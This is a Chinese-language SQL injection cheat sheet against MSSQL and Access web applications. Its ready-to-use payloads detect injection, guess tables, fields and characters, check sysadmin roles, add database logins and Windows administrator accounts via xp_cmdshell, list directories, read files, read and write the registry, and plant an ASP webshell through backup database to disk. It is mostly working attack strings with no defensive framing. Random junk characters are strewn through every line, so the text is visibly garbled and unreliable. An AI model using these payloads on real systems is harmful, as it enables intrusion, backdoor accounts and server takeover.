1.判断是否有注入;and 1=1 ;and 1=2 ~I{EE[F>qL
2.初步判断是否是mssql ;and user>0
!M
Ye9Y^+-
3.注入参数是字符'and [查询条件] and ''=' j|:dYt`WM
IByf_E;r
4.搜索时没过滤参数的'and [查询条件] and '%25'=' _fcS>/<a
"j{i,&Y$_
5.判断数据库系统 nz4<pvC,*
*IC^IC:
;and (select count(*) from sysobjects)>0 mssql A_!QrM
')B =|T)
;and (select count(*) from msysobjects)>0 access >T<6fpXuk2
\|CPR6I
10p8|9rE}B
yn SBVb!)
6.猜数据库 ;and (select Count(*) from [数据库名])>0 )uZoH8?
#
;K,,ku
x
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 C:]s;0$3'9
=M7TCE
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 EXuLSzQwv
MkwU<ae AB
9.(1)猜字段的ascii值(access) D^Te%qnW
w/ TKRCO3
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 LO)GTyzvJ
{Fbg]'FQ
(2)猜字段的ascii值(mssql) ]eE 1n2
]kx-,M(
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 P0^c?s"I
8{dEpV*
10.测试权限结构(mssql) ;HDZ+B
S}[l*7
3y99O
$EAc
2
P=[
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- &VDl/qnaL
[F+(^- (
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- *h$&0w
y
-."kq.m*
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- k<H%vg>{~s
(
#*"c
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ~.J,A\F
tJNIr5o
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- zh\$t]d<I
4o<*PPA1
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- %}P4kEY
H+ lX-,
;and 1=(select IS_MEMBER('db_owner'));-- (89Ji'dc
',7a E@PJ
F@Q^?WV
WmeKl
11.添加mssql和系统的帐户 *m9{V8Yi2
LN4qYp6)G
;exec master.dbo.sp_addlogin username;-- 4S|=/f
;exec master.dbo.sp_password null,username,password;-- k;k}qq`d
iK#/w1`
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- l4rMk^>>
ldGojnS
;exec master.dbo.xp_cmdshell 'net user username password W^es;5
VPt9QL(
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 4:7m K/Z
{^#2=`:)O
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ?c]n^GvG
Tzzq#z&F
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- Ytao"R/
aBhV3Fd[B
"xe=N
MoD?2J
12.(1)遍历目录 v!9i"@<!
D8%AV;-Y
;create table dirs(paths varchar(100), id int) qi(*ty
7{e=="#*
;insert dirs exec master.dbo.xp_dirtree 'c:\' qj!eLA-aD
WNs}sNSf
;and (select top 1 paths from dirs)>0 7\ypW $Ot
PY`L$e
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) hN3u@P^
y7:tr
\=;uu_v$
Ye5jB2Z
(2)遍历目录 w\Mnu}<e$
;#1Iiuh
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- WkP
+r9rT
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 DIaYo4
~>Kq<]3~
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 nPN?kO=]
JN4fPGbV
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 Ya#h'+}
paW@\1Q
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 :=Kx/E:1
n((vY.NDV
$bvJTuw
5|I55CTx
13.mssql中的存储过程 G_ >G'2
FY'ty@|_s
xp_regenumvalues 注册表根键, 子键 2 rN ,D(
#aar9
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 AVl~{k|
Wh(
|+rJ?Z
xp_regread 根键,子键,键值名 x[Im%k
o31Nmy
Ni
;exec xp_regread `y^sITr
H={&3poBz
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ;apzAF
2-'Opu
xp_regwrite 根键,子键, 值名, 值类型, 值 Wht(O~F
2;$k(x]
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 )J D(`
wW 2d\Zd&
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 4/e60jA
egk7O4zwP
xp_regdeletevalue 根键,子键,值名 -c%dvck^,
47r&8C+&\
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 f )Z%pgB
445o DkG
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 MFt*&%,JX
VZy4_v=
?4 S+edX
#]]Su91BA
14.mssql的backup创建webshell ]y@F8$D!
&fOdlQ?
use model e:w&(is
yX!HZu;j
create table cmd(str image); C&~1M}I
=1p8i
insert into cmd(str) values (''); Rp9fO?ZjHt
&?,6~qm[
backup database model to disk='c:\l.asp'; T ?Fcohz(
g(C|!}ex/
|X19fgk
k]A8% z
15.mssql内置函数 7.Kc:7
#A7jyg":
;and (select @@version)>0 获得Windows的版本号 C?4JXW
d[D&J
;and user_name()='dbo' 判断当前系统的连接用户是不是sa S6d`ioi-
kc `V4b%
;and (select user_name())>0 爆当前系统的连接用户 uC3:7
SOZPZUUEJ
;and (select db_name())>0 得到当前连接的数据库 %dST6$Z
*?ITns W<
Ih}1%Jq
p d[ncL
16.简洁的webshell LQYy;<K
fvq,,@23
use model OZY, @c
e({9]
create table cmd(str image); S~Z|PLtF
qa`-* 4m
insert into cmd(str) values (''); N2'qpxOLI
Z?P~z07
backup database model to disk='g:\wwwtest\l.asp';